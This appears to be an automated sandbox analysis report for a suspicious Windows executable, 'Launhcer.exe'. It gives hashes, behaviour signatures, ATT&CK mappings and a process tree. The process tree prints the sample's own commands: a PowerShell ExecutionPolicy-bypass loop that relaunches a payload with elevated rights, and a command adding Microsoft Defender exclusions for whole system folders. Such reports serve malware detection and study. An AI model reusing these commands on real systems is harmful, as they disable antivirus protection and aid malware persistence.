Analysis

  • max time kernel
    121s
  • max time network
    138s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23-02-2024 10:15

General

  • Target

    data/AppInfo/services/Launhcer.exe

  • Size

    364KB

  • MD5

    e5c00b0bc45281666afd14eef04252b2

  • SHA1

    3b6eecf8250e88169976a5f866d15c60ee66b758

  • SHA256

    542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

  • SHA512

    2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

  • SSDEEP

    6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
    "C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
        "C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4392
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4216
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
          4⤵
            PID:5112

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      db01a2c1c7e70b2b038edf8ad5ad9826

      SHA1

      540217c647a73bad8d8a79e3a0f3998b5abd199b

      SHA256

      413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

      SHA512

      c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      69abf6b01a287d3bab9aa753a19562ac

      SHA1

      cb002d745055132c11e5432f9ca5c8f452c6067d

      SHA256

      477924224be8ac5194c94a52115ac451c63530c0ce9bfe757598ef9cf84b495e

      SHA512

      70c2b8f847da67b95a3d15cea9912cddddfc59d7f1f2f350c3c1c13e28baa5f6efd448013e5134e9f909705be7b0e38e6748aacce4237e6b0e2cdedaa647bccf

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfnruqfw.jm4.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • memory/1632-8-0x00000000082F0000-0x0000000008356000-memory.dmp
      Filesize

      408KB

    • memory/1632-29-0x00000000098F0000-0x000000000990A000-memory.dmp
      Filesize

      104KB

    • memory/1632-7-0x0000000007A10000-0x0000000007A32000-memory.dmp
      Filesize

      136KB

    • memory/1632-192-0x0000000072730000-0x0000000072E1E000-memory.dmp
      Filesize

      6.9MB

    • memory/1632-9-0x00000000083A0000-0x0000000008406000-memory.dmp
      Filesize

      408KB

    • memory/1632-10-0x0000000008410000-0x0000000008760000-memory.dmp
      Filesize

      3.3MB

    • memory/1632-11-0x0000000008240000-0x000000000825C000-memory.dmp
      Filesize

      112KB

    • memory/1632-12-0x00000000087E0000-0x000000000882B000-memory.dmp
      Filesize

      300KB

    • memory/1632-13-0x0000000008B30000-0x0000000008BA6000-memory.dmp
      Filesize

      472KB

    • memory/1632-5-0x0000000007430000-0x0000000007440000-memory.dmp
      Filesize

      64KB

    • memory/1632-28-0x0000000009BB0000-0x0000000009C44000-memory.dmp
      Filesize

      592KB

    • memory/1632-6-0x0000000007A70000-0x0000000008098000-memory.dmp
      Filesize

      6.2MB

    • memory/1632-30-0x0000000009940000-0x0000000009962000-memory.dmp
      Filesize

      136KB

    • memory/1632-31-0x000000000A150000-0x000000000A64E000-memory.dmp
      Filesize

      5.0MB

    • memory/1632-290-0x0000000072730000-0x0000000072E1E000-memory.dmp
      Filesize

      6.9MB

    • memory/1632-2-0x0000000072730000-0x0000000072E1E000-memory.dmp
      Filesize

      6.9MB

    • memory/1632-3-0x0000000007310000-0x0000000007346000-memory.dmp
      Filesize

      216KB

    • memory/1632-4-0x0000000007430000-0x0000000007440000-memory.dmp
      Filesize

      64KB

    • memory/1632-285-0x0000000007430000-0x0000000007440000-memory.dmp
      Filesize

      64KB

    • memory/1632-284-0x0000000007430000-0x0000000007440000-memory.dmp
      Filesize

      64KB

    • memory/1632-282-0x0000000007430000-0x0000000007440000-memory.dmp
      Filesize

      64KB

    • memory/4216-39-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
      Filesize

      64KB

    • memory/4216-66-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
      Filesize

      64KB

    • memory/4216-65-0x0000000009140000-0x00000000091E5000-memory.dmp
      Filesize

      660KB

    • memory/4216-260-0x0000000006D90000-0x0000000006DAA000-memory.dmp
      Filesize

      104KB

    • memory/4216-265-0x0000000006D80000-0x0000000006D88000-memory.dmp
      Filesize

      32KB

    • memory/4216-281-0x0000000072730000-0x0000000072E1E000-memory.dmp
      Filesize

      6.9MB

    • memory/4216-60-0x00000000090D0000-0x00000000090EE000-memory.dmp
      Filesize

      120KB

    • memory/4216-59-0x000000006F4D0000-0x000000006F51B000-memory.dmp
      Filesize

      300KB

    • memory/4216-58-0x00000000090F0000-0x0000000009123000-memory.dmp
      Filesize

      204KB

    • memory/4216-57-0x000000007EFE0000-0x000000007EFF0000-memory.dmp
      Filesize

      64KB

    • memory/4216-40-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
      Filesize

      64KB

    • memory/4216-38-0x0000000072730000-0x0000000072E1E000-memory.dmp
      Filesize

      6.9MB